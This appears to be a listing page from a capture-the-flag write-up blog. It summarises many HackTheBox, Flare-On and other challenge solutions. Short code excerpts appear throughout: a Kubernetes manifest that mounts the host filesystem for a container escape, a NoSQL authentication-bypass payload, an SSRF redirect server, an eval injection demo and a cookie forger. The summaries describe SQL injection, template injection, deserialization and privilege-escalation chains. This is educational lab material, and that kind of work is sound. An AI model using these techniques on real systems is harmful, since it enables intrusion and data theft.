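The "mount the host filesystem into a new pod" step above can be sketched as a pod manifest. The names and image here are illustrative, not the exact spec from the writeup; the key piece is the `hostPath` volume pointing at `/`, which gives full read/write on the node under `/host` inside the container.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: attacker-pod
spec:
  containers:
  - name: shell
    image: nginx
    volumeMounts:
    - name: hostfs
      mountPath: /host      # node's / appears here inside the container
  volumes:
  - name: hostfs
    hostPath:
      path: /               # mount the node's root filesystem
```

Applied with `kubectl apply -f pod.yaml` (using the stolen service account token), then `kubectl exec` into the pod to read or write anything on the host, such as root's `authorized_keys`.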
HTB: EarlyAccessctf htb-earlyaccess hackthebox nmap wfuzz vhosts php laravel xss xss-cookies python injection sqli second-order second-order-sqli htb-nightmare command-injection api php-filter source-code burp burp-repeater docker container password-reuse wget escape arp directory-traversal
When it comes to telling a story, EarlyAccess might be my favorite box on HackTheBox. It’s the box of a game company, with fantastic marketing on their front page for a game that turns out to be snake. I’ll need multiple exploits including XSS and second order SQLI to get admin on the signup site, abuse that to move to the game site, and from there to the dev site. From the dev site I’ll find a command injection to get a shell in the website’s docker container. I’ll abuse an API to leak another password to get onto the host. From there it’s back into another docker container, where I’ll crash the container to get execution and shell as root, getting access to the shadow file and a password for the host. Finally, I’ll abuse capabilities on arp to get read as root, the flag, and the root SSH key. In Beyond Root, looking at a couple unintended paths.
HTB: Flusteredhtb-flustered hackthebox ctf uni-ctf nmap feroxbuster wfuzz vhosts squid glusterfs mysql foxyproxy ssti flask docker container azure-storage azure-storage-explorer youtube
Flustered starts out with a coming soon webpage and a squid proxy. When both turn out to be dead ends, I’ll identify GlusterFS, with a volume I can mount without auth. This volume has the MySQL data stores, and from it I’ll find Squid credentials. With access to the proxy, I’ll find the application source code, and exploit a server-side template injection vulnerability to get execution. With a foothold, I’ll find the keys necessary to get access to a second Gluster volume, which gives access as user. To root, I’ll connect to a Docker container hosting an emulated Azure Storage, and using a key from the host, pull the root SSH key. In Beyond root, an exploration into Squid and NGINX configs, and a look at fully recreating the database based on the files from the remote volume.
FunWare [CactusCon 2022 CTF]ctf cactuscon ctf-funware forensics malware reverse-engineering ftk-imager access-data-file ransomeware pyinstaller pyinstxtractor flare-on-wopr uncompyle6 python firefox firepwd sqlite
Over the weekend, a few of us from Neutrino Cannon competed in the CactusCon 2022 CTF by ThreatSims. PolarBearer and I worked on a challenge called Funware, an interesting forensics challenge that starts with a disk image of a system that’d been ransomwared, and leads to understanding the malware, decrypting the files, and finding where it was downloaded from. It was a fun forensics challenge. Thanks to @pwnEIP and @Cone_Virus for the challenge and for getting me the questions after it was over so I could write this up.
HTB: Horizontallctf hackthebox htb-horizontall nmap feroxbuster source-code vhosts strapi cve-2019-18818 cve-2019-19609 command-injection burp burp-repeater laravel phpggc deserialization oscp-like
Horizontall was built around vulnerabilities in two web frameworks. First there’s discovering an instance of strapi, where I’ll abuse a CVE to reset the administrator’s password, and then use an authenticated command injection vulnerability to get a shell. With a foothold on the box, I’ll examine a dev instance of Laravel running only on localhost, and manage to crash it and leak the secrets. From there, I can do a deserialization attack to get execution as root. In Beyond Root, I’ll dig a bit deeper on the strapi CVEs and how they were patched.
HTB: Pressedctf htb-pressed hackthebox nmap wordpress uhc burp wpscan totp 2fa xml-rpc python python-wordpress-xmlrpc cyberchef webshell pwnkit cve-2021-4034 pkexec iptables youtube htb-scavenger htb-stratosphere wp-miniorgange
Pressed presents a unique attack vector on WordPress, where you have access to admin creds right from the start, but can’t log in because of 2FA. This means it’s time to abuse XML-RPC, the thing that wpscan shows as a vulnerability on every WordPress instance but is rarely useful. I’ll leak the source for the single post on the site, and see that it’s using PHPEverywhere to run PHP from within the post. I’ll edit the post to include a webshell. The firewall is blocking outbound traffic, so I can’t get a reverse shell. The box is vulnerable to PwnKit, but I’ll have to modify the exploit to work over the webshell. After leaking the root flag, I’ll go beyond with a video where I take down the firewall and get a root shell.
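XML-RPC requests like the ones abused above are easy to build with just the Python standard library. This is a generic sketch, not the exact tooling from the writeup: `wp.getUsersBlogs` is a real WordPress XML-RPC method commonly used to test credentials, while the host and creds are placeholders.

```python
import xmlrpc.client

# Serialize a credential-check call into the XML-RPC wire format.
# The resulting body would be POSTed to http://target/xmlrpc.php,
# a path that 2FA plugins often fail to protect.
body = xmlrpc.client.dumps(("admin", "password123"),
                           methodname="wp.getUsersBlogs")
print(body)
```

The `python-wordpress-xmlrpc` library wraps this same protocol with higher-level objects for fetching and editing posts.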
HTB: Anubishackthebox ctf htb-anubis nmap iis crackmapexec vhosts wfuzz feroxbuster ssti xss certificate adcs htb-sizzle youtube openssl certificate-authority client-certificate tunnel chisel proxychains foxyproxy wireshark responder hashcat net-ntlmv2 smbclient jamovi cve-2021-28079 electron javascript certutil certreq certify certificate-template kerberos klist kinit evil-winrm posh-adcs rubeus sharp-collection powerview psexec-py faketime htb-sizzle
Anubis starts simply enough, with an ASP injection leading to code execution in a Windows Docker container. In the container I’ll find a certificate request, which leaks the hostname of an internal web server. That server is handling software installs, and by giving it my IP, I’ll capture and crack the NetNTLMv2 hash associated with the account doing the installs. That account provides SMB access, where I find Jamovi files, one of which has been accessed recently. I’ll exploit these files to get execution and a foothold on the host. To escalate, I’ll find a certificate template that the current user has full control over. I’ll use that control to add smart card authentication as a purpose for the template, and create one for administrator. I’ll show how to do this the more manual way, getting the certificate and then authenticating with Kerberos from my Linux VM. Then I’ll go back and do it again using PoshADCS and Rubeus all on Anubis.
HTB: Forgectf htb-forge hackthebox nmap wfuzz ssrf feroxbuster vhosts filter redirection flask python pdb youtube oscp-like
The website on Forge has a server-side request forgery (SSRF) vulnerability that I can use to access the admin site, available only from localhost. But to do that, I have to bypass a deny list of terms in the given URL. I’ll have the server contact me, and return a redirect to the site I actually want to have it visit. From the admin site, I can see that it too has an SSRF, and it can manage FTP as well. I’ll update my redirect to have it fetch files from the local FTP server, including the user flag and the user’s SSH private key. The user is able to run a Python script as root, and because of how this script uses PDB (the Python debugger), I can exploit the crash to get a shell as root. In Beyond Root, I’ll look at bypassing the filter, and explore the webserver configuration to figure out how the webserver talks FTP.
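The redirect trick above can be sketched with the standard library: the fetcher is allowed to visit my host (which isn't on the deny list), and a 302 bounces it to the filtered URL. This is a minimal illustration, not the writeup's exact server; the target URL is a placeholder.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical filtered destination the server-side fetcher should end up at
TARGET = "ftp://127.0.0.1/"

class Bounce(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a redirect instead of content;
        # the SSRF client follows the Location header to TARGET
        self.send_response(302)
        self.send_header("Location", TARGET)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet

# Port 0 picks a free port; in a real attack you'd bind 0.0.0.0:80.
# server.serve_forever() runs it.
server = HTTPServer(("127.0.0.1", 0), Bounce)
```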
HTB: Developerctf htb-developer hackthebox youtube nmap feroxbuster django python crypto dnspy ps2exe xls office msoffice excel hashcat reverse-engineering gdb ghidra cyberchef reverse-tab-nabbing flask deserialization sentry postgres
Developer is a CTF platform modeled off of HackTheBox! When I sign up for an account, there are eight real challenges to play across four different categories. On solving one, I can submit a write-up link, which the admin will click. This link is vulnerable to reverse-tab-nabbing, a neat exploit where the writeup opens in a new window, but it can get the original window to redirect to a site of my choosing. I’ll make it look like it logged out, and capture credentials from the admin, giving me access to the Django admin panel and the Sentry application. I’ll crash that application to see Django is running in debug mode, and get the secret necessary to perform a deserialization attack, providing execution and a foothold on the box. I’ll dump the Django hashes from the PostgreSQL DB for Sentry and crack them to get the creds for the next user. For root, there’s a sudo executable that I can reverse to get the password which leads to SSH access as root.
HTB: NodeBlogctf htb-nodeblog hackthebox uhc youtube python nmap feroxbuster nodejs nosql-injection payloadsallthethings xxe node-serialize deserialization json-deserialization mongo mongodump bsondump
This UHC qualifier box was a neat take on some common NodeJS vulnerabilities. First there’s a NoSQL authentication bypass. Then I’ll use XXE in some post upload ability to leak files, including the site source. With that, I’ll spot a deserialization vulnerability which I can abuse to get RCE. I’ll get the user’s password from Mongo via the shell or through the NoSQL injection, and use that to escalate to root. In Beyond Root, a look at characters that broke the deserialization payload, and scripting the NoSQL injection.
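The NoSQL authentication bypass mentioned above follows a common PayloadsAllTheThings pattern: MongoDB query operators are smuggled in via JSON, so the password comparison matches any stored value. This is a generic sketch with hypothetical field names, not the box's exact request.

```python
import json

# $ne ("not equal") makes Mongo match any document whose password
# isn't the literal string "wrong" -- i.e., any real password
payload = {"user": "admin", "password": {"$ne": "wrong"}}
body = json.dumps(payload)
# POSTing `body` as the login request bypasses the password check
```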
HTB: Previsehtb-previse ctf hackthebox nmap execute-after-redirect burp burp-repeater source-code php injection command-injection path-hijack hashcat sudo sqli sqli-insert youtube oscp-like
To get a foothold on Previse, first I’ll exploit an execute after redirect vulnerability in the webpage that allows me access to restricted sites despite not being logged in. From those sites, I’ll create a user for myself and log in normally. Then I get the source to the site, and I’ll find a command injection vulnerability (both using the source and just by enumerating the site) to get a foothold on the box. To escalate, I’ll go into the database and dump the user hashes, one of which cracks to the password for a user on the box. For root, there’s a bash script with a path hijack vulnerability that can run with sudo, allowing for execution. In Beyond Root I’ll look at the standard sudo config and what was changed for Previse, and then look at an unintended SQL injection in an insert statement.
2021 SANS Holiday Hack Challenge, featuring KringleCon 4: Calling Birdsctf sans-holiday-hack
The 2021 SANS Holiday Hack Challenge was the battle of two competing conferences. Santa is hosting the 4th annual KringleCon at the North Pole, and Jack Frost has set up a competing conference next door, FrostFest. This year’s conference included 14 talks from leaders in information security, including a late entry from the elf, Professor Qwerty Petabyte, covering Log4j. In addition to the talks, there were 15 terminals / in-game puzzles and 13 objectives to solve. In solving all of these, Jack Frost’s plot was foiled. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving.
Hackvent 2021ctf hackvent python git gitdumper obfuscation brainfuck polyglot jsfuck de4js pil reverse-engineering pcap wireshark nmap content-length ignore-content-length cistercian-numerals code-golf type-juggling ghidra clara-io stl youtube kotlin race-condition p-384 eliptic-curve signing crypto
This year I was only able to complete 14 of the 24 days of challenges, but it was still a good time. I learned something about how web clients handle content lengths, how to obfuscate JavaScript for a golf competition, and exploited some neat crypto to sign commands for a server.
HTB: LogForgectf hackthebox htb-logforge nmap uhc jsp jsessionid tomcat feroxbuster apache-tomcat-parse burp burp-repeater msfvenom war log4shell log4j jndi ysoserial jndi-exploit-kit ysoserial-modified jd-gui reverse-engineering jar wireshark ldap uri-parsing htb-seal htb-pikaboo
LogForge was a UHC box that HTB created entirely focused on Log4j / Log4Shell. To start, there’s an Orange Tsai attack against how Apache is hosting Tomcat, allowing the bypass of restrictions to get access to the manager page. From there, I’ll exploit Log4j to get a shell as the tomcat user. With a foothold on the machine, there’s an FTP server running as root listening only on localhost. This FTP server is Java based, and reversing it shows it’s using Log4j to log usernames. I’ll exploit this to leak the environment variables used to store the username and password needed to access the FTP server, and use that to get access to the root flag. The password also works to get a root shell. In Beyond Root I’ll look at using netcat to read the LDAP requests and do some binary RE of LDAP on the wire.
HTB: Staticctf htb-static hackthebox nmap feroxbuster vpn openvpn totp fixgz oathtool ntp ntpdate route xdebug dbgpClient htb-olympus htb-jewel tunnel socks filter cve-2019-11043 webshell format-string htb-rope gdb aslr socat pspy path-hijack easy-rsa
Static was a really great hard box. I’ll start by finding a corrupted gzipped SQL backup, which I can use to leak the seed for a TOTP 2FA, allowing me access to an internal page. There I’ll get a VPN config, which I’ll use to connect to the network and get access to additional hosts. There’s a web host that has xdebug running on its PHP page, allowing for code execution. From there, I’ll pivot to a PKI host that I can only reach from web. I’ll exploit a PHP-FPM bug to get a shell on there. On this box, there’s a binary with setuid capabilities and a format string exploit, which I’ll use to leak addresses and then overwrite the path to a binary called to have it run my reverse shell. In Beyond Root, I’ll look at an unintended Path Hijack in an actual open-source program, easy-rsa.
HTB: Writerhackthebox ctf htb-writer nmap feroxbuster sqli injection auth-bypass ffuf sqlmap burp burp-repeater apache flask django command-injection hashcat postfix swaks apt oscp-plus
Writer was really hard for a medium box. There’s an SQL injection that provides both authentication bypass and file read on the system. The foothold involved either chaining together file uploads and file downloads to get a command injection, or using an SSRF to trigger a development site that is editable using creds found in the site files to access SMB. With a shell, the first pivot is using creds from the Django DB after cracking the hash. Then I’ll inject into a Postfix mail filter and trigger it by sending an email. Finally, there’s an editable apt config file that allows command injection as root. In Beyond Root, I’ll show the intended path using the SSRF to trigger the modified dev site.
HTB: Pikabooctf htb-pikaboo hackthebox nmap debian feroxbuster off-by-slash lfi log-poisoning perl-diamond-injection perl ldap ldapsearch htb-seal oscp-plus
Pikaboo required a lot of enumeration and putting together different pieces to get through each step. I’ll only ever get a shell as www-data and root, but for each step there’s several pieces to pull together and combine to some effect. I’ll start by abusing an off-by-slash vulnerability in the interaction between NGINX and Apache to get access to a staging server. In there, I’ll use an LFI to include FTP logs, which I can poison with PHP to get execution. As www-data, I’ll find a cron running a Perl script as root, which is vulnerable to command injection via the diamond operator. I’ll find creds for another user in LDAP and get access to FTP, where I can drop a file that will be read and give execution to get a shell as root.
HTB: Intelligencectf htb-intelligence hackthebox nmap windows crackmapexec smbmap smbclient smb dns dnsenum ldapsearch exiftool feroxbuster kerbrute python password-spray bloodhound bloodhound-py dnstool responder hashcat readgmsapassword gmsa gmsadumper silver-ticket wmiexec oscp-like
Intelligence was a great box for Windows and Active Directory enumeration and exploitation. I’ll start with a lot of enumeration against a domain controller. Eventually I’ll brute force a naming pattern to pull down PDFs from the website, finding the default password for new user accounts. Spraying that across all the users I enumerated returns one that works. From there, I’ll find a PowerShell script that runs every five minutes on Intelligence that is making a web request to each DNS in the AD environment that starts with web. I’ll add myself as a server, and use responder to capture a hash when it next runs. On cracking that hash, I’ll have a new user, and bloodhound shows that account has control over a service account’s GMSA password. That service account has delegation on the domain. I’ll exploit those relationships to get administrator on the box.
HTB: Unionctf htb-union hackthebox uhc nmap sqli filter waf feroxbuster burp burp-repeater sqli-file credentials injection command-injection sudo iptables
The November Ultimate Hacking Championship qualifier box is Union. There’s a tricky-to-find union SQL injection that will allow for file reads, which leaks the users on the box as well as the password for the database. Those combine to get SSH access. Once on the box, I’ll notice that www-data is modifying the firewall, which is a privileged action, using sudo. Analysis of the page source shows it is command injectable via the X-Forwarded-For header, which provides a shell as www-data. This account has full sudo rights, providing root access.
HTB: BountyHunterctf htb-bountyhunter hackthebox nmap xxe feroxbuster decoder python credentials password-reuse python-eval command-injection
BountyHunter has a really nice simple XXE vulnerability in a webpage that provides access to files on the host. With that, I can get the users on the system, as well as a password in a PHP script, and use that to get SSH access to the host. To privesc, there’s a ticket validation script that runs as root that is vulnerable to Python eval injection.
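The Python eval injection pattern above is worth illustrating: a validator that uses `eval()` on arithmetic pulled from the ticket will also evaluate any other Python expression. This is a simplified sketch of the vulnerability class (the function name is mine, not the box's script).

```python
def validate_code(code: str) -> object:
    # Intended use: evaluate simple arithmetic like "11 + 3" from the ticket.
    # Dangerous: eval runs ANY expression the attacker supplies.
    return eval(code)

# Benign input works as designed
benign = validate_code("11 + 3")  # 14

# Malicious input: any Python expression runs, e.g. reaching the os module
hijack = validate_code("__import__('os').getpid()")
```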
RunCode Live 2021 Solutionsctf runcode youtube
I’ve been posting solutions on YouTube for the RunCode Live 2021 competition held 11-13 November 2021. This is a programming CTF, so I’ll show how I approach various problems using mostly Python. Check them out, and subscribe on YouTube to get notified as I add more videos.
HTB: Sealhackthebox ctf htb-seal nmap wfuzz vhosts nginx tomcat feroxbuster git-bucket off-by-slash git mutual-authentication uri-parsing war msfvenom ansible htb-tabby oscp-like
In Seal, I’ll get access to the NGINX and Tomcat configs, and find both Tomcat passwords and a misconfiguration that allows me to bypass the certificate-based authentication by abusing differences in how NGINX and Tomcat parse URLs. The rest of the box is about Ansible, the automation platform. I’ll abuse a backup playbook being run on a cron to get the next user. And I’ll write my own playbook and abuse sudo to get root.
HTB: Three More PivotAPI Unintendedsctf hackthebox htb-pivotapi windows mssql-shell seimpersonate efspotato sebackupvolume ntfscontrolfile dcsync secretsdump rubeus sharp-collection kerberos ticketconverter ntpdate crackmapexec wmiexec
There were three other techniques that were used as shortcuts on PivotAPI that I thought were worth sharing but that I didn’t have time to get into my original post. xct tipped me off to exploiting SeImpersonate using EfsPotato (even after the print spooler was disabled), as well as abusing SeManageVolume to get full read/write as admin. TheCyberGeek and IppSec both showed how to abuse delegation to do a DCSync attack.
HTB: PivotAPIctf hackthebox htb-pivotapi nmap windows active-directory exiftool as-rep-roast getuserspns hashcat mssql mssqlclient bloodhound smbmap smbclient mbox mutt msgconvert reverse-engineering procmon vbs api-monitor crackmapexec mssql-shell mssqlproxy evil-winrm keepass genericall powersploit powerview tunnel dotnet dnspy forcechangepassword laps winpeas powershell-run-as cyberchef seimpersonate printspoofer htb-safe oscp-plus
PivotAPI had so many steps. It starts and ends with Active Directory attacks, first finding a username in PDF metadata and using that to AS-REP Roast. This user has access to some binaries related to managing a database. I’ll reverse them mostly with dynamic analysis to find the password through several layers of obfuscation, eventually gaining access to the MSSQL service. From there, I’ll use mssqlproxy to tunnel WinRM through the DB, where I find a KeePass DB. Those creds give SSH access, where I’ll then pivot through some vulnerable privileges to get access to a developer’s share. In there, another binary that I can use to fetch additional creds. Finally, after another pivot through misconfigured privileges, I’ll get access to the LAPS password for the administrator. In Beyond Root, I’ll show some unintended paths.
Flare-On 2021: PetTheKittyflare-on ctf flare-on-petthekitty reverse-engineering youtube wireshark delta-patch dll ghidra python scapy
PetTheKitty started with a PCAP with two streams. The first was used to download and run a DLL malware, and the second was the C2 communications of that malware. The malware and the initial downloader use Windows Delta patches to exchange information. I’ll reverse the binary to understand the algorithm and decode the reverse shell session to find the flag.
HTB: Nunchuckshackthebox ctf htb-nunchucks uhc nmap wfuzz vhosts feroxbuster ssti express express-nunchucks capabilities gtfobins apparmor
October’s UHC qualifying box, Nunchucks, starts with a template injection vulnerability in an Express JavaScript application. There are a lot of templating engines that Express can use, but this one is using Nunchucks. After getting a shell, there’s what looks like a simple GTFObins privesc, as the Perl binary has the setuid capability. However, AppArmor is blocking the simple exploitation, and will need to be bypassed to get a root shell.
Flare-On 2021: knownflare-on ctf flare-on-known reverse-engineering youtube crypto ghidra python
known presented a ransomware file decrypter, as well as a handful of encrypted files. If I can figure out the key to give the decrypter, it will decrypt the files, one of which contains the flag. I’ll use Ghidra to determine the algorithm, then recreate it in Python, and brute force all possible keys to find the right one.
HTB: Explorectf hackthebox htb-explore nmap android adb es-file-explorer cve-2019-6447 credentials tunnel
Explore is the first Android box on HTB. There’s a relatively simple file read vulnerability in ES File Explorer that allows me to read images off the phone, including one with a password in it. With that password I’ll SSH into the phone, and access the Android debug (adb) service, where I can easily get a shell as root.
Flare-On 2021: myaquaticlifeflare-on ctf flare-on-myaquaticlife reverse-engineering upx multimedia-builder mmunbuilder x64dbg ghidra python brute-force
myaquaticlife was a Windows exe built on a really old multimedia framework, Multimedia Builder. I’ll use a project on Github to decompile it back to the framework file, and look at it in the original software. There’s a DLL used as a plugin that tracks the order of clicks on fish, and I can figure out the order to click and get the flag.
Flare-On 2021: beeloginflare-on ctf flare-on-beelogin reverse-engineering javascript jsfuck de4js python bruteforce deobfuscation
beelogin starts with a simple HTML page with five input fields. Diving into the source, there’s almost sixty thousand lines of JavaScript. The vast majority of that ends up being junk that isn’t run. I’ll trim it down to around 30 lines. Then there’s some math to track where each of 64 bytes in the key impact which bytes of the result. Once I have that, I can check for bytes that produce valid JavaScript, and find the key. The result is some obfuscated JavaScript that comes out to be doing the same thing again, on the second half of the key. Once I have both halves, I can get the flag or put the key in and get the page to give it to me.
Flare-On 2021: flarelinuxvmflare-on ctf flare-on-flarelinuxvm reverse-engineering vm cyberchef encoding crypto ghidra ransomware youtube
Flare Linux VM starts with a VM and some ransomware encrypted files. I’ll have to triage, find the malware, and reverse it to understand that it’s using a static key stream to encrypt the files. With that stream, I can decrypt and get the files, which provide a series of CTF puzzles to get a password which I can give to the binary and get the final flag.
HTB: Spooktrolhtb-spooktrol ctf hackthebox nmap api fastapi python feroxbuster reverse-engineering wireshark ghidra burp burp-proxy upload sqlite uhc
spooktrol is another UHC championship box created by IppSec. It’s all about attacking a malware C2 server, software with a long history of including silly bugs. In this one, I’ll hijack the tasking message and have it upload a file, which, using a directory traversal bug, allows me to write to root’s authorized keys file on the container. Then, I’ll exploit the C2’s database to write a task to another agent and get a shell on that box. In Beyond Root, I’ll look at an unintended directory traversal vulnerability in the implant download.
Flare-On 2021: spelflare-on ctf flare-on-spel reverse-engineering ghidra unpack shellcode dll x64dbg anti-debug
spel was a Russian nesting doll of binaries. It starts with a giant function that has thousands of move instructions setting a single byte at a time into a buffer and then calling it. That buffer is shellcode that loads and calls a DLL. That DLL loads and calls a function from a second DLL. In that DLL, there are a series of checks that cause the program to exit (different file name, network connection), before the flag bytes are eventually decoded from a PNG resource in the original binary, and then scrambled into an order only observable in a debugger.
Flare-On 2021: antiochflare-on ctf flare-on-antioch reverse-engineering docker docker-tar python ghidra hackvent
antioch was a challenge based on the old movie, Monty Python and the Holy Grail. I’m given a Tar archive, which is a Docker image, the output of a command like
docker save. It has a lot of layer data, but most of the layers are not referenced in the manifest. The image does have a single ELF executable in it. Through reversing this binary, I’ll see how it expects input matching the various authors from the metadata in the unused layers, and how each author has an id associated with it. I’ll use the order of those IDs to reconstruct the Docker image to include the files in the right order, and then the new image will give the flag.
HTB: Spiderhackthebox htb-spider ctf nmap flask python flask-cookie payloadsallthethings ssti jinja2 injection sqli sqlmap sqlmap-eval ssti-blind waf filter tunnel xxe
Spider was all about classic attacks in unusual places. There’s a limited SSTI in a username that allows me to leak a Flask secret. I’ll use that to generate Flask cookies with SQL injection payloads inside to leak a user id, and gain admin access on the site. From there, another SSTI, but this time blind, to get RCE and a shell. For root, there’s a XXE in a cookie that allows me to leak the final flag as well as the root ssh key.
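Forging signed cookies with a leaked secret, as described above, can be sketched with the standard library. Note this is a simplified scheme for illustration only: real Flask cookies use itsdangerous (timestamped, optionally zlib-compressed), so in practice a tool like flask-unsign or Flask itself does the signing. The secret and payload here are hypothetical.

```python
import base64, hashlib, hmac, json

SECRET = b"leaked-secret"  # hypothetical secret leaked via SSTI

def sign(payload: dict) -> str:
    # Serialize, base64, and HMAC the payload; anyone with SECRET can
    # mint cookies the server will accept
    data = base64.urlsafe_b64encode(json.dumps(payload).encode())
    sig = hmac.new(SECRET, data, hashlib.sha1).hexdigest()
    return f"{data.decode()}.{sig}"

def verify(cookie: str) -> dict:
    # Server-side check: recompute the HMAC and compare
    data, sig = cookie.rsplit(".", 1)
    expected = hmac.new(SECRET, data.encode(), hashlib.sha1).hexdigest()
    assert hmac.compare_digest(sig, expected), "bad signature"
    return json.loads(base64.urlsafe_b64decode(data))
```

With the secret known, the `payload` dict can carry anything, including the SQL injection strings used against Spider.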
Flare-On 2021: wizardcultflare-on ctf flare-on-wizardcult reverse-engineering go python youtube crypto ghidra irc inspircd c2
The last challenge in Flare-On 8 was probably not harder than the ninth one, but it might have been the one I had the most fun attacking. In a mad rush to finish on time, I didn’t take great notes, so instead, I went back and solved it start to finish on YouTube.
Flare-On 2021: credcheckerflare-on ctf flare-on-credchecker reverse-engineering html javascript python youtube
Flare-On 8 got off to an easy start with an HTML page and a login form. The page has JavaScript to accept and check the password, and I’ll show two ways to get the flag - pulling the password and then logging in, and decrypting the flag buffer.
HTB: Dynstrhackthebox ctf htb-dynstr nmap dynamic-dns no-ip feroxbuster dnsenum command-injection injection cyberchef scriptreplay dns nsupdate authorized-keys wildcard php bash passwd oscp-plus
Dynstr was a super neat concept based around a dynamic DNS provider. To start, I’ll find command injection in the DNS / IP update API. Then I’ll find a private key in a script replay of a debugging session and strace logs. I’ll also need to tinker with the DNS resolutions to allow myself to connect over SSH, as the authorized_keys file has restrictions in it. For root, there’s a simple wildcard injection into a script I can run as root, and I’ll show two ways to exploit that. In Beyond Root, a break down of the DNS API, and a look at an unintended flag leak and a dive into Bash variables and number comparisons.
HTB: Monitorsctf htb-monitors hackthebox nmap vhosts wordpress wpscan wp-with-spritz sqli injection exploitdb password-reuse lfi apache-config cacti cve-2020-14295 python systemd crontab docker feroxbuster solr cve-2020-9496 ysoserial docker-escape kernel-module oscp-plus
Monitors starts off with a WordPress blog that is vulnerable to a local file include vulnerability that allows me to read files from system. In doing so, I’ll discover another virtual host serving a vulnerable version of Cacti, which I’ll exploit via SQL injection that leads to code execution. From there, I’ll identify a new service in development running Apache Solr in a Docker container, and exploit that to get into the container. The container is running privileged, which I’ll abuse by installing a malicious kernel module to get access as root on the host.
HTB: Caphtb-cap hackthebox ctf nmap pcap idor feroxbuster wireshark credentials capabilities linpeas
Cap provided a chance to exploit two simple yet interesting capabilities. First, there’s a website with an insecure direct object reference (IDOR) vulnerability, where the site will collect a PCAP for me, but I can also access other users’ PCAPs, to include one from the user of the box with their FTP credentials, which also provides SSH access as that user. With a shell, I’ll find that in order for the site to collect pcaps, it needs some privileges, which are provided via Linux capabilities, including one that I’ll abuse to get a shell as root.
HTB: Jarmisctf hackthebox htb-jarmis ja3 ja3s jarm tls nmap vhosts ncat feroxbuster fastapi ssrf wfuzz jq metasploit msf-custom-module iptables omigod cve-2021-38647 python flask gopher code-review htb-laser htb-travel uhc
My favorite part about Jarmis was that it is centered around this really neat technology used to fingerprint and identify TLS servers. There’s an application that will scan a given server and report back the Jarm signature, and if that signature matches something potentially malicious in the database, it will do a GET request to that server to collect additional metadata. I’ll abuse that service to get a list of open ports on localhost and find 5985/5986, which are typically WinRM. Given that Jarmis is a Linux host, it’s odd, and it turns out that this is the same port that OMI listens to, and the host is vulnerable to OMIGod. To exploit this, I’ll find a POC and convert it into a Gopher redirect by redirecting the GET request. I’ll need to create a malicious server as well, and I’ll show two ways, using IPTables and a custom Metasploit module. In Beyond Root, I’ll look at the webserver config, and find the error in the public Jarm code that allowed me to use Jarm as a port scanner.
HTB: Pitctf htb-pit hackthebox centos nmap udp snmp feroxbuster snmpwalk seeddms cve-2019-12744 exploitdb webshell upload selinux cockpit htb-sneaky getfacl facl oscp-like
Pit used SNMP in two different ways. First, I’ll enumerate it to leak the location of a webserver running SeedDMS, where I’ll abuse a webshell upload vulnerability to get RCE on the host. I’m not able to get a reverse shell because of SELinux, but I can enumerate enough to find a password for michelle, and use that to get access to a Cockpit instance which offers a terminal. From there, I’ll find that I can write scripts that will be run by SNMP, and I’ll use that to get execution and a shell as root. In Beyond Root, a look at SELinux and how it blocked things I tried to do on Pit.
HTB: Sink
htb-sink hackthebox ctf nmap gitea haproxy gunicorn request-smuggling localstack aws aws-secretsmanager aws-kms iptables htb-bucket htb-gobox git
Sink was an amazing box touching on two major exploitation concepts. First is the request smuggling attack, where I send a malformed packet that tricks the front-end server and back-end server interactions such that the next user’s request is handled as a continuation of my request. After that, I’ll find an AWS instance (localstack) and exploit various services in that, including the secrets manager and key management services. In Beyond Root, I’ll look at the way this box was configured to allow for multiple users to do request smuggling at the same time.
HTB: Validation
ctf htb-validation hackthebox uhc nmap cookies feroxbuster burp burp-repeater sqli injection second-order-sqli python python-cmd sqli-file webshell password-reuse credentials
Validation is another box HTB made for the UHC competition. It is a qualifier box, meant to be easy and help select the top ten to compete later this month. Once it was done on UHC, HTB made it available. In this box, I’ll exploit a second-order SQL injection, write a script to automate the enumeration, and identify that the SQL user has FILE permissions. I’ll use that to write a webshell, and get execution. For root, it’s simple password reuse from the database. In Beyond Root, I’ll look at how this box started and ended in a container.
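The enumeration script mentioned here is a recurring pattern in these writeups: wrapping a one-off injection request in Python’s cmd module to get a REPL instead of re-sending requests through Burp by hand. A minimal sketch of that pattern, assuming nothing about the actual box — the class name is mine, and the send() function that would really register a malicious username and trigger the second-order injection is stubbed out:

```python
import cmd

class InjectShell(cmd.Cmd):
    """Skeleton of a python-cmd wrapper for injection enumeration.
    Hypothetical names; the real send() would deliver the query through
    the vulnerable parameter and scrape the result from the response."""
    prompt = "sqli> "

    def __init__(self, send=None):
        super().__init__()
        # send() delivers one injected query to the target; stubbed out
        # here so the sketch stays self-contained
        self.send = send or (lambda query: f"[stub] would inject: {query}")

    def do_query(self, line):
        """query <SQL> -- run one injected query and print the result"""
        print(self.send(line))

    def do_exit(self, line):
        """exit -- leave the shell"""
        return True

# Start an interactive loop with: InjectShell().cmdloop()
```

With a real send() plugged in, each `query select @@version` style command becomes one round trip to the target.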
HTB: Schooled
ctf htb-schooled hackthebox nmap moodle feroxbuster wfuzz vhosts cve-2020-25627 cve-2020-14321 moodle-plugin webshell password-reuse credentials hashcat pkg freebsd package htb-teacher
Schooled starts with a string of exploits to gain more and more privilege in a Moodle instance, eventually leading to a malicious plugin upload that provides a webshell. I’ll pull some hashes from the DB and crack them to get to the next user. This user can run the FreeBSD package manager, pkg, as root, and can also write to the hosts file. I’ll trick it into connecting to my VM, and give it a malicious package that provides root. In Beyond Root, I’ll look at the Moodle plugin a bit more in depth.
HTB: Unobtainium
hackthebox ctf htb-unobtainium nmap kubernetes deb package electron nodejs lfi prototype-pollution command-injection injection asar sans-holiday-hack htb-onetwoseven source-code kubectl
Unobtainium was the first box on HackTheBox to play with Kubernetes, a technology for deploying and managing containers. It also has an Electron application to reverse, which allows for multiple exploits against the server: first a local file include, then prototype pollution, and finally command injection. With a shell, I’ll find a way to gain admin access over Kubernetes and get root with a malicious container.
HTB: Gobox
hackthebox htb-gobox ctf uhc nmap ubuntu go ssti feroxbuster youtube python python-cmd aws awscli docker s3 webshell upload nginx-module backdoor nginxexecute
